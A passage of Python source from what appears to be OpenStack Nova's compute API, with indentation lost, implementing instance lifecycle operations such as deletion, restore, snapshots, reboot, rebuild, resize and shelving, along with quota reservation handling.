old_ref, instance_ref = self.db.instance_update_and_get_original(
context, instance['uuid'], kwargs)
notifications.send_update(context, old_ref,
instance_ref, service="api")
return dict(old_ref.iteritems()), dict(instance_ref.iteritems())
def _check_auto_disk_config(self, instance=None, image=None,
**extra_instance_updates):
auto_disk_config = extra_instance_updates.get("auto_disk_config")
if auto_disk_config is None:
return
if not image and not instance:
return
if image:
image_props = image.get("properties", {})
auto_disk_config_img = \
utils.get_auto_disk_config_from_image_props(image_props)
image_ref = image.get("id")
else:
sys_meta = utils.instance_sys_meta(instance)
image_ref = sys_meta.get('image_base_image_ref')
auto_disk_config_img = \
utils.get_auto_disk_config_from_instance(sys_meta=sys_meta)
self._ensure_auto_disk_config_is_valid(auto_disk_config_img,
auto_disk_config,
image_ref)
def _delete(self, context, instance, delete_type, cb, **instance_attrs):
if instance.disable_terminate:
LOG.info(_('instance termination disabled'),
instance=instance)
return
host = instance['host']
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = quotas_obj.ids_from_instance(context, instance)
# At these states an instance has a snapshot associate.
if instance['vm_state'] in (vm_states.SHELVED,
vm_states.SHELVED_OFFLOADED):
snapshot_id = instance.system_metadata.get('shelved_image_id')
LOG.info(_("Working on deleting snapshot %s "
"from shelved instance..."),
snapshot_id, instance=instance)
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
except Exception as exc:
LOG.exception(_LE("Something wrong happened when trying to "
"delete snapshot from shelved instance."),
instance=instance)
original_task_state = instance.task_state
quotas = None
try:
# NOTE(maoy): no expected_task_state needs to be set
instance.update(instance_attrs)
instance.progress = 0
instance.save()
# NOTE(comstud): If we delete the instance locally, we'll
# commit the reservations here. Otherwise, the manager side
# will commit or rollback the reservations based on success.
quotas = self._create_reservations(context,
instance,
original_task_state,
project_id, user_id)
if self.cell_type == 'api':
# NOTE(comstud): If we're in the API cell, we need to
# skip all remaining logic and just call the callback,
# which will cause a cast to the child cell. Also,
# commit reservations here early until we have a better
# way to deal with quotas with cells.
cb(context, instance, bdms, reservations=None)
quotas.commit()
return
if not host:
try:
compute_utils.notify_about_instance_usage(
self.notifier, context, instance,
"%s.start" % delete_type)
instance.destroy()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance,
"%s.end" % delete_type,
system_metadata=instance.system_metadata)
quotas.commit()
return
except exception.ObjectActionError:
instance.refresh()
if instance.vm_state == vm_states.RESIZED:
self._confirm_resize_on_deleting(context, instance)
is_up = False
try:
service = objects.Service.get_by_compute_host(
context.elevated(), instance.host)
if self.servicegroup_api.service_is_up(service):
is_up = True
if original_task_state in (task_states.DELETING,
task_states.SOFT_DELETING):
LOG.info(_('Instance is already in deleting state, '
'ignoring this request'), instance=instance)
quotas.rollback()
return
self._record_action_start(context, instance,
instance_actions.DELETE)
cb(context, instance, bdms,
reservations=quotas.reservations)
except exception.ComputeHostNotFound:
pass
if not is_up:
# If compute node isn't up, just delete from DB
self._local_delete(context, instance, bdms, delete_type, cb)
quotas.commit()
except exception.InstanceNotFound:
# NOTE(comstud): Race condition. Instance already gone.
if quotas:
quotas.rollback()
except Exception:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
def _confirm_resize_on_deleting(self, context, instance):
# If in the middle of a resize, use confirm_resize to
# ensure the original instance is cleaned up too
migration = None
for status in ('finished', 'confirming'):
try:
migration = objects.Migration.get_by_instance_and_status(
context.elevated(), instance.uuid, status)
LOG.info(_('Found an unconfirmed migration during delete, '
'id: %(id)s, status: %(status)s') %
{'id': migration.id,
'status': migration.status},
context=context, instance=instance)
break
except exception.MigrationNotFoundByStatus:
pass
if not migration:
LOG.info(_('Instance may have been confirmed during delete'),
context=context, instance=instance)
return
src_host = migration.source_compute
# Call since this can race with the terminate_instance.
# The resize is done but awaiting confirmation/reversion,
# so there are two cases:
# 1. up-resize: here -instance['vcpus'/'memory_mb'] match
# the quota usages accounted for this instance,
# so no further quota adjustment is needed
# 2. down-resize: here -instance['vcpus'/'memory_mb'] are
# shy by delta(old, new) from the quota usages accounted
# for this instance, so we must adjust
try:
deltas = self._downsize_quota_delta(context, instance)
except KeyError:
LOG.info(_('Migration %s may have been confirmed during delete') %
migration.id, context=context, instance=instance)
return
quotas = self._reserve_quota_delta(context, deltas, instance)
self._record_action_start(context, instance,
instance_actions.CONFIRM_RESIZE)
self.compute_rpcapi.confirm_resize(context,
instance, migration,
src_host, quotas.reservations,
cast=False)
def _create_reservations(self, context, instance, original_task_state,
project_id, user_id):
instance_vcpus = instance.vcpus
instance_memory_mb = instance.memory_mb
# NOTE(wangpan): if the instance is resizing, and the resources
# are updated to new instance type, we should use
# the old instance type to create reservation.
# see https://bugs.launchpad.net/nova/+bug/1099729 for more details
if original_task_state in (task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH):
try:
migration = objects.Migration.get_by_instance_and_status(
context.elevated(), instance.uuid, 'post-migrating')
except exception.MigrationNotFoundByStatus:
migration = None
if (migration and
instance.instance_type_id ==
migration.new_instance_type_id):
old_inst_type_id = migration.old_instance_type_id
try:
old_inst_type = flavors.get_flavor(old_inst_type_id)
except exception.FlavorNotFound:
LOG.warning(_("Flavor %d not found"), old_inst_type_id)
pass
else:
instance_vcpus = old_inst_type['vcpus']
vram_mb = int(old_inst_type.get('extra_specs',
{}).get(VIDEO_RAM, 0))
instance_memory_mb = (old_inst_type['memory_mb'] + vram_mb)
LOG.debug("going to delete a resizing instance",
instance=instance)
quotas = objects.Quotas(context)
quotas.reserve(context,
project_id=project_id,
user_id=user_id,
instances=-1,
cores=-instance_vcpus,
ram=-instance_memory_mb)
return quotas
def _local_delete(self, context, instance, bdms, delete_type, cb):
LOG.warning(_("instance's host %s is down, deleting from "
"database") % instance['host'], instance=instance)
instance.info_cache.delete()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, "%s.start" % delete_type)
elevated = context.elevated()
if self.cell_type != 'api':
self.network_api.deallocate_for_instance(elevated,
instance)
# cleanup volumes
for bdm in bdms:
if bdm.is_volume:
# NOTE(vish): We don't have access to correct volume
# connector info, so just pass a fake
# connector. This can be improved when we
# expose get_volume_connector to rpc.
connector = {'ip': '127.0.0.1', 'initiator': 'iqn.fake'}
try:
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(elevated, bdm.volume_id)
if bdm.delete_on_termination:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
err_str = _("Ignoring volume cleanup failure due to %s")
LOG.warn(err_str % exc, instance=instance)
bdm.destroy(context)
cb(context, instance, bdms, local=True)
sys_meta = instance.system_metadata
instance.destroy()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, "%s.end" % delete_type,
system_metadata=sys_meta)
def _do_delete(self, context, instance, bdms, reservations=None,
local=False):
if local:
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.terminated_at = timeutils.utcnow()
instance.save()
else:
self.compute_rpcapi.terminate_instance(context, instance, bdms,
reservations=reservations)
def _do_soft_delete(self, context, instance, bdms, reservations=None,
local=False):
if local:
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.terminated_at = timeutils.utcnow()
instance.save()
else:
self.compute_rpcapi.soft_delete_instance(context, instance,
reservations=reservations)
# NOTE(maoy): we allow delete to be called no matter what vm_state says.
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=None, task_state=None,
must_have_launched=True)
def soft_delete(self, context, instance):
"""Terminate an instance."""
LOG.debug('Going to try to soft delete instance',
instance=instance)
self._delete(context, instance, 'soft_delete', self._do_soft_delete,
task_state=task_states.SOFT_DELETING,
deleted_at=timeutils.utcnow())
def _delete_instance(self, context, instance):
self._delete(context, instance, 'delete', self._do_delete,
task_state=task_states.DELETING)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=None, task_state=None,
must_have_launched=False)
def delete(self, context, instance):
"""Terminate an instance."""
LOG.debug("Going to try to terminate instance", instance=instance)
self._delete_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SOFT_DELETED])
def restore(self, context, instance):
"""Restore a previously deleted (but not reclaimed) instance."""
# Reserve quotas
flavor = instance.get_flavor()
num_instances, quotas = self._check_num_instances_quota(
context, flavor, 1, 1)
self._record_action_start(context, instance, instance_actions.RESTORE)
try:
if instance.host:
instance.task_state = task_states.RESTORING
instance.deleted_at = None
instance.save(expected_task_state=[None])
self.compute_rpcapi.restore_instance(context, instance)
else:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.deleted_at = None
instance.save(expected_task_state=[None])
quotas.commit()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
@wrap_check_policy
@check_instance_lock
@check_instance_state(must_have_launched=False)
def force_delete(self, context, instance):
"""Force delete an instance in any vm_state/task_state."""
self._delete_instance(context, instance)
def force_stop(self, context, instance, do_cast=True):
LOG.debug("Going to try to stop instance", instance=instance)
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.STOP)
self.compute_rpcapi.stop_instance(context, instance, do_cast=do_cast)
@check_instance_lock
@check_instance_host
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.ERROR])
def stop(self, context, instance, do_cast=True):
"""Stop an instance."""
self.force_stop(context, instance, do_cast)
@check_instance_lock
@check_instance_host
@check_instance_cell
@check_instance_state(vm_state=[vm_states.STOPPED])
def start(self, context, instance):
"""Start an instance."""
LOG.debug("Going to try to start instance", instance=instance)
instance.task_state = task_states.POWERING_ON
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.START)
# TODO(yamahata): injected_files isn't supported right now.
# It is used only for osapi. not for ec2 api.
# availability_zone isn't used by run_instance.
self.compute_rpcapi.start_instance(context, instance)
def get(self, context, instance_id, want_objects=False,
expected_attrs=None):
"""Get a single instance with the given instance_id."""
if not expected_attrs:
expected_attrs = []
expected_attrs.extend(['metadata', 'system_metadata',
'security_groups', 'info_cache'])
# NOTE(ameade): we still need to support integer ids for ec2
try:
if uuidutils.is_uuid_like(instance_id):
instance = objects.Instance.get_by_uuid(
context, instance_id, expected_attrs=expected_attrs)
elif utils.is_int_like(instance_id):
instance = objects.Instance.get_by_id(
context, instance_id, expected_attrs=expected_attrs)
else:
raise exception.InstanceNotFound(instance_id=instance_id)
except exception.InvalidID:
raise exception.InstanceNotFound(instance_id=instance_id)
check_policy(context, 'get', instance)
if not want_objects:
instance = obj_base.obj_to_primitive(instance)
return instance
def get_all(self, context, search_opts=None, sort_key='created_at',
sort_dir='desc', limit=None, marker=None, want_objects=False,
expected_attrs=None):
"""Get all instances filtered by one of the given parameters.
If there is no filter and the context is an admin, it will retrieve
all instances in the system.
Deleted instances will be returned by default, unless there is a
search option that says otherwise.
The results will be returned sorted in the order specified by the
'sort_dir' parameter using the key specified in the 'sort_key'
parameter.
"""
# TODO(bcwaldon): determine the best argument for target here
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
check_policy(context, "get_all", target)
if search_opts is None:
search_opts = {}
LOG.debug("Searching by: %s" % str(search_opts))
# Fixups for the DB call
filters = {}
def _remap_flavor_filter(flavor_id):
flavor = objects.Flavor.get_by_flavor_id(context, flavor_id)
filters['instance_type_id'] = flavor.id
def _remap_fixed_ip_filter(fixed_ip):
# Turn fixed_ip into a regexp match. Since '.' matches
# any character, we need to use regexp escaping for it.
filters['ip'] = '^%s$' % fixed_ip.replace('.', '\\.')
def _remap_metadata_filter(metadata):
filters['metadata'] = jsonutils.loads(metadata)
def _remap_system_metadata_filter(metadata):
filters['system_metadata'] = jsonutils.loads(metadata)
# search_option to filter_name mapping.
filter_mapping = {
'image': 'image_ref',
'name': 'display_name',
'tenant_id': 'project_id',
'flavor': _remap_flavor_filter,
'fixed_ip': _remap_fixed_ip_filter,
'metadata': _remap_metadata_filter,
'system_metadata': _remap_system_metadata_filter}
# copy from search_opts, doing various remappings as necessary
for opt, value in search_opts.iteritems():
# Do remappings.
# Values not in the filter_mapping table are copied as-is.
# If remapping is None, option is not copied
# If the remapping is a string, it is the filter_name to use
try:
remap_object = filter_mapping[opt]
except KeyError:
filters[opt] = value
else:
# Remaps are strings to translate to, or functions to call
# to do the translating as defined by the table above.
if isinstance(remap_object, six.string_types):
filters[remap_object] = value
else:
try:
remap_object(value)
# We already know we can't match the filter, so
# return an empty list
except ValueError:
return []
inst_models = self._get_instances_by_filters(context, filters,
sort_key, sort_dir, limit=limit, marker=marker,
expected_attrs=expected_attrs)
if want_objects:
return inst_models
# Convert the models to dictionaries
instances = []
for inst_model in inst_models:
instances.append(obj_base.obj_to_primitive(inst_model))
return instances
def _get_instances_by_filters(self, context, filters,
sort_key, sort_dir,
limit=None,
marker=None, expected_attrs=None):
if 'ip6' in filters or 'ip' in filters:
res = self.network_api.get_instance_uuids_by_ip_filter(context,
filters)
# NOTE(jkoelker) It is possible that we will get the same
# instance uuid twice (one for ipv4 and ipv6)
uuids = set([r['instance_uuid'] for r in res])
filters['uuid'] = uuids
fields = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
if expected_attrs:
fields.extend(expected_attrs)
return objects.InstanceList.get_by_filters(
context, filters=filters, sort_key=sort_key, sort_dir=sort_dir,
limit=limit, marker=marker, expected_attrs=fields)
# NOTE(melwitt): We don't check instance lock for backup because lock is
# intended to prevent accidental change/delete of instances
@wrap_check_policy
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def backup(self, context, instance, name, backup_type, rotation,
extra_properties=None):
"""Backup the given instance
:param instance: nova.db.sqlalchemy.models.Instance
:param name: name of the backup
:param backup_type: 'daily' or 'weekly'
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
:param extra_properties: dict of extra image properties to include
when creating the image.
:returns: A dict containing image metadata
"""
props_copy = dict(extra_properties, backup_type=backup_type)
image_meta = self._create_image(context, instance, name,
'backup', extra_properties=props_copy)
# NOTE(comstud): Any changes to this method should also be made
# to the backup_instance() method in nova/cells/messaging.py
instance.task_state = task_states.IMAGE_BACKUP
instance.save(expected_task_state=[None])
self.compute_rpcapi.backup_instance(context, instance,
image_meta['id'],
backup_type,
rotation)
return image_meta
# NOTE(melwitt): We don't check instance lock for snapshot because lock is
# intended to prevent accidental change/delete of instances
@wrap_check_policy
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.PAUSED, vm_states.SUSPENDED])
def snapshot(self, context, instance, name, extra_properties=None):
"""Snapshot the given instance.
:param instance: nova.db.sqlalchemy.models.Instance
:param name: name of the snapshot
:param extra_properties: dict of extra image properties to include
when creating the image.
:returns: A dict containing image metadata
"""
image_meta = self._create_image(context, instance, name,
'snapshot',
extra_properties=extra_properties)
# NOTE(comstud): Any changes to this method should also be made
# to the snapshot_instance() method in nova/cells/messaging.py
instance.task_state = task_states.IMAGE_SNAPSHOT_PENDING
instance.save(expected_task_state=[None])
self.compute_rpcapi.snapshot_instance(context, instance,
image_meta['id'])
return image_meta
def _create_image(self, context, instance, name, image_type,
extra_properties=None):
"""Create new image entry in the image service. This new image
will be reserved for the compute manager to upload a snapshot
or backup.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param name: string for name of the snapshot
:param image_type: snapshot | backup
:param extra_properties: dict of extra image properties to include
"""
if extra_properties is None:
extra_properties = {}
instance_uuid = instance['uuid']
properties = {
'instance_uuid': instance_uuid,
'user_id': str(context.user_id),
'image_type': image_type,
}
image_ref = instance.image_ref
sent_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
sent_meta['name'] = name
sent_meta['is_public'] = False
# The properties set up above and in extra_properties have precedence
properties.update(extra_properties or {})
sent_meta['properties'].update(properties)
return self.image_api.create(context, sent_meta)
# NOTE(melwitt): We don't check instance lock for snapshot because lock is
# intended to prevent accidental change/delete of instances
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def snapshot_volume_backed(self, context, instance, image_meta, name,
extra_properties=None):
"""Snapshot the given volume-backed instance.
:param instance: nova.db.sqlalchemy.models.Instance
:param image_meta: metadata for the new image
:param name: name of the backup or snapshot
:param extra_properties: dict of extra image properties to include
:returns: the new image metadata
"""
image_meta['name'] = name
image_meta['is_public'] = False
properties = image_meta['properties']
if instance['root_device_name']:
properties['root_device_name'] = instance['root_device_name']
properties.update(extra_properties or {})
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
mapping = []
for bdm in bdms:
if bdm.no_device:
continue
if bdm.is_volume:
# create snapshot based on volume_id
volume = self.volume_api.get(context, bdm.volume_id)
# NOTE(yamahata): Should we wait for snapshot creation?
# Linux LVM snapshot creation completes in
# short time, it doesn't matter for now.
name = _('snapshot for %s') % image_meta['name']
snapshot = self.volume_api.create_snapshot_force(
context, volume['id'], name, volume['display_description'])
mapping_dict = block_device.snapshot_from_bdm(snapshot['id'],
bdm)
mapping_dict = mapping_dict.get_image_mapping()
else:
mapping_dict = bdm.get_image_mapping()
mapping.append(mapping_dict)
# NOTE (ndipanov): Remove swap/ephemerals from mappings as they will be
# in the block_device_mapping for the new image.
image_mappings = properties.get('mappings')
if image_mappings:
properties['mappings'] = [m for m in image_mappings
if not block_device.is_swap_or_ephemeral(
m['virtual'])]
if mapping:
properties['block_device_mapping'] = mapping
properties['bdm_v2'] = True
for attr in ('status', 'location', 'id', 'owner'):
image_meta.pop(attr, None)
# the new image is simply a bucket of properties (particularly the
# block device mapping, kernel and ramdisk IDs) with no image data,
# hence the zero size
image_meta['size'] = 0
return self.image_api.create(context, image_meta)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=set(
vm_states.ALLOW_SOFT_REBOOT + vm_states.ALLOW_HARD_REBOOT),
task_state=[None, task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED,
task_states.REBOOTING_HARD,
task_states.RESUMING,
task_states.UNPAUSING,
task_states.PAUSING,
task_states.SUSPENDING])
def reboot(self, context, instance, reboot_type):
"""Reboot the given instance."""
if (reboot_type == 'SOFT' and
(instance['vm_state'] not in vm_states.ALLOW_SOFT_REBOOT)):
raise exception.InstanceInvalidState(
attr='vm_state',
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method='soft reboot')
if ((reboot_type == 'SOFT' and
instance['task_state'] in
(task_states.REBOOTING, task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING, task_states.REBOOT_STARTED)) or
(reboot_type == 'HARD' and
instance['task_state'] == task_states.REBOOTING_HARD)):
raise exception.InstanceInvalidState(
attr='task_state',
instance_uuid=instance['uuid'],
state=instance['task_state'],
method='reboot')
state = {'SOFT': task_states.REBOOTING,
'HARD': task_states.REBOOTING_HARD}[reboot_type]
instance.task_state = state
instance.save(expected_task_state=[None, task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED])
self._record_action_start(context, instance, instance_actions.REBOOT)
self.compute_rpcapi.reboot_instance(context, instance=instance,
block_device_info=None,
reboot_type=reboot_type)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def rebuild(self, context, instance, image_href, admin_password,
files_to_inject=None, **kwargs):
"""Rebuild the given instance with the provided attributes."""
orig_image_ref = instance.image_ref or ''
files_to_inject = files_to_inject or []
metadata = kwargs.get('metadata', {})
preserve_ephemeral = kwargs.get('preserve_ephemeral', False)
auto_disk_config = kwargs.get('auto_disk_config')
image_id, image = self._get_image(context, image_href)
self._check_auto_disk_config(image=image, **kwargs)
flavor = instance.get_flavor()
self._checks_for_create_and_rebuild(context, image_id, image,
flavor, metadata, files_to_inject)
kernel_id, ramdisk_id = self._handle_kernel_and_ramdisk(
context, None, None, image)
def _reset_image_metadata():
"""Remove old image properties that we're storing as instance
system metadata. These properties start with 'image_'.
Then add the properties for the new image.
"""
# FIXME(comstud): There's a race condition here in that if
# the system_metadata for this instance is updated after
# we do the previous save() and before we update.. those
# other updates will be lost. Since this problem exists in
# a lot of other places, I think it should be addressed in
# a DB layer overhaul.
orig_sys_metadata = dict(instance.system_metadata)
# Remove the old keys
for key in instance.system_metadata.keys():
if key.startswith(utils.SM_IMAGE_PROP_PREFIX):
del instance.system_metadata[key]
# Add the new ones
new_sys_metadata = utils.get_system_metadata_from_image(
image, flavor)
instance.system_metadata.update(new_sys_metadata)
instance.save()
return orig_sys_metadata
# Since image might have changed, we may have new values for
# os_type, vm_mode, etc
options_from_image = self._inherit_properties_from_image(
image, auto_disk_config)
instance.update(options_from_image)
instance.task_state = task_states.REBUILDING
instance.image_ref = image_href
instance.kernel_id = kernel_id or ""
instance.ramdisk_id = ramdisk_id or ""
instance.progress = 0
instance.update(kwargs)
instance.save(expected_task_state=[None])
# On a rebuild, since we're potentially changing images, we need to
# wipe out the old image properties that we're storing as instance
# system metadata... and copy in the properties for the new image.
orig_sys_metadata = _reset_image_metadata()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._record_action_start(context, instance, instance_actions.REBUILD)
self.compute_task_api.rebuild_instance(context, instance=instance,
new_pass=admin_password, injected_files=files_to_inject,
image_ref=image_href, orig_image_ref=orig_image_ref,
orig_sys_metadata=orig_sys_metadata, bdms=bdms,
preserve_ephemeral=preserve_ephemeral, host=instance.host,
kwargs=kwargs)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.RESIZED])
def revert_resize(self, context, instance):
"""Reverts a resize, deleting the 'new' instance in the process."""
elevated = context.elevated()
migration = objects.Migration.get_by_instance_and_status(
elevated, instance.uuid, 'finished')
# reverse quota reservation for increased resource usage
deltas = self._reverse_upsize_quota_delta(context, migration)
quotas = self._reserve_quota_delta(context, deltas, instance)
instance.task_state = task_states.RESIZE_REVERTING
try:
instance.save(expected_task_state=[None])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback(context)
migration.status = 'reverting'
migration.save()
# With cells, the best we can do right now is commit the reservations
# immediately...
if CONF.cells.enable:
quotas.commit(context)
self._record_action_start(context, instance,
instance_actions.REVERT_RESIZE)
self.compute_rpcapi.revert_resize(context, instance,
migration,
migration.dest_compute,
quotas.reservations or [])
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.RESIZED])
def confirm_resize(self, context, instance, migration=None):
"""Confirms a migration/resize and deletes the 'old' instance."""
elevated = context.elevated()
if migration is None:
migration = objects.Migration.get_by_instance_and_status(
elevated, instance.uuid, 'finished')
# reserve quota only for any decrease in resource usage
deltas = self._downsize_quota_delta(context, instance)
quotas = self._reserve_quota_delta(context, deltas, instance)
migration.status = 'confirming'
migration.save()
# With cells, the best we can do right now is commit the reservations
# immediately...
if CONF.cells.enable:
quotas.commit(context)
self._record_action_start(context, instance,
instance_actions.CONFIRM_RESIZE)
self.compute_rpcapi.confirm_resize(context,
instance,
migration,
migration.source_compute,
quotas.reservations or [])
@staticmethod
def _resize_quota_delta(context, new_flavor,
old_flavor, sense, compare):
"""Calculate any quota adjustment required at a particular point
in the resize cycle.
:param context: the request context
:param new_instance_type: the target instance type
:param old_instance_type: the original instance type
:param sense: the sense of the adjustment, 1 indicates a
forward adjustment, whereas -1 indicates a
reversal of a prior adjustment
:param compare: the direction of the comparison, 1 indicates
we're checking for positive deltas, whereas
-1 indicates negative deltas
"""
def _quota_delta(resource):
return sense * (new_flavor[resource] - old_flavor[resource])
deltas = {}
if compare * _quota_delta('vcpus') > 0:
deltas['cores'] = _quota_delta('vcpus')
if compare * _quota_delta('memory_mb') > 0:
deltas['ram'] = _quota_delta('memory_mb')
return deltas
@staticmethod
def _upsize_quota_delta(context, new_flavor, old_flavor):
"""Calculate deltas required to adjust quota for an instance upsize.
"""
return API._resize_quota_delta(context, new_flavor, old_flavor, 1, 1)
@staticmethod
def _reverse_upsize_quota_delta(context, migration_ref):
"""Calculate deltas required to reverse a prior upsizing
quota adjustment.
"""
old_flavor = objects.Flavor.get_by_id(
context, migration_ref['old_instance_type_id'])
new_flavor = objects.Flavor.get_by_id(
context, migration_ref['new_instance_type_id'])
return API._resize_quota_delta(context, new_flavor, old_flavor, -1, -1)
@staticmethod
def _downsize_quota_delta(context, instance):
"""Calculate deltas required to adjust quota for an instance downsize.
"""
old_flavor = instance.get_flavor('old')
new_flavor = instance.get_flavor('new')
return API._resize_quota_delta(context, new_flavor, old_flavor, 1, -1)
@staticmethod
def _reserve_quota_delta(context, deltas, instance):
"""If there are deltas to reserve, construct a Quotas object and
reserve the deltas for the given project.
@param context: The nova request context.
@param deltas: A dictionary of the proposed delta changes.
@param instance: The instance we're operating on, so that
quotas can use the correct project_id/user_id.
@return: nova.objects.quotas.Quotas
"""
quotas = objects.Quotas()
if deltas:
project_id, user_id = quotas_obj.ids_from_instance(context,
instance)
quotas.reserve(context, project_id=project_id, user_id=user_id,
**deltas)
return quotas
@staticmethod
def _resize_cells_support(context, quotas, instance,
current_instance_type, new_instance_type):
"""Special API cell logic for resize."""
# With cells, the best we can do right now is commit the
# reservations immediately...
quotas.commit(context)
# NOTE(johannes/comstud): The API cell needs a local migration
# record for later resize_confirm and resize_reverts to deal
# with quotas. We don't need source and/or destination
# information, just the old and new flavors. Status is set to
# 'finished' since nothing else will update the status along
# the way.
mig = objects.Migration()
mig.instance_uuid = instance.uuid
mig.old_instance_type_id = current_instance_type['id']
mig.new_instance_type_id = new_instance_type['id']
mig.status = 'finished'
mig.create(context.elevated())
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED])
def resize(self, context, instance, flavor_id=None,
**extra_instance_updates):
"""Resize (ie, migrate) a running instance.
If flavor_id is None, the process is considered a migration, keeping
the original flavor_id. If flavor_id is not None, the instance should
be migrated to a new host and resized to the new flavor_id.
"""
self._check_auto_disk_config(instance, **extra_instance_updates)
current_instance_type = flavors.extract_flavor(instance)
# If flavor_id is not provided, only migrate the instance.
if not flavor_id:
LOG.debug("flavor_id is None. Assuming migration.",
instance=instance)
new_instance_type = current_instance_type
else:
new_instance_type = flavors.get_flavor_by_flavor_id(
flavor_id, read_deleted="no")
if (new_instance_type.get('root_gb') == 0 and
current_instance_type.get('root_gb') != 0):
reason = _('Resize to zero disk flavor is not allowed.')
raise exception.CannotResizeDisk(reason=reason)
if not new_instance_type:
raise exception.FlavorNotFound(flavor_id=flavor_id)
current_instance_type_name = current_instance_type['name']
new_instance_type_name = new_instance_type['name']
LOG.debug("Old instance type %(current_instance_type_name)s, "
" new instance type %(new_instance_type_name)s",
{'current_instance_type_name': current_instance_type_name,
'new_instance_type_name': new_instance_type_name},
instance=instance)
same_instance_type = (current_instance_type['id'] ==
new_instance_type['id'])
# NOTE(sirp): We don't want to force a customer to change their flavor
# when Ops is migrating off of a failed host.
if not same_instance_type and new_instance_type.get('disabled'):
raise exception.FlavorNotFound(flavor_id=flavor_id)
if same_instance_type and flavor_id and self.cell_type != 'compute':
raise exception.CannotResizeToSameFlavor()
# ensure there is sufficient headroom for upsizes
deltas = self._upsize_quota_delta(context, new_instance_type,
current_instance_type)
try:
quotas = self._reserve_quota_delta(context, deltas, instance)
except exception.OverQuota as exc:
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
headroom = exc.kwargs['headroom']
resource = overs[0]
used = quotas[resource] - headroom[resource]
total_allowed = used + headroom[resource]
overs = ','.join(overs)
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to resize instance."),
{'overs': overs, 'pid': context.project_id})
raise exception.TooManyInstances(overs=overs,
req=deltas[resource],
used=used, allowed=total_allowed,
resource=resource)
instance.task_state = task_states.RESIZE_PREP
instance.progress = 0
instance.update(extra_instance_updates)
instance.save(expected_task_state=[None])
filter_properties = {'ignore_hosts': []}
if not CONF.allow_resize_to_same_host:
filter_properties['ignore_hosts'].append(instance['host'])
# Here when flavor_id is None, the process is considered as migrate.
if (not flavor_id and not CONF.allow_migrate_to_same_host):
filter_properties['ignore_hosts'].append(instance['host'])
if self.cell_type == 'api':
# Commit reservations early and create migration record.
self._resize_cells_support(context, quotas, instance,
current_instance_type,
new_instance_type)
if not flavor_id:
self._record_action_start(context, instance,
instance_actions.MIGRATE)
else:
self._record_action_start(context, instance,
instance_actions.RESIZE)
scheduler_hint = {'filter_properties': filter_properties}
self.compute_task_api.resize_instance(context, instance,
extra_instance_updates, scheduler_hint=scheduler_hint,
flavor=new_instance_type,
reservations=quotas.reservations or [])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.PAUSED, vm_states.SUSPENDED])
def shelve(self, context, instance):
"""Shelve an instance.
Shuts down an instance and frees it up to be removed from the
hypervisor.
"""
instance.task_state = task_states.SHELVING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.SHELVE)
image_id = None
if not self.is_volume_backed_instance(context, instance):
name = '%s-shelved' % instance['display_name']
image_meta = self._create_image(context, instance, name,
'snapshot')
image_id = image_meta['id']
self.compute_rpcapi.shelve_instance(context, instance=instance,
image_id=image_id)
else:
self.compute_rpcapi.shelve_offload_instance(context,
instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SHELVED])
def shelve_offload(self, context, instance):
"""Remove a shelved instance from the hypervisor."""
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save(expected_task_state=[None])
self.compute_rpcapi.shelve_offload_instance(context, instance=instance)
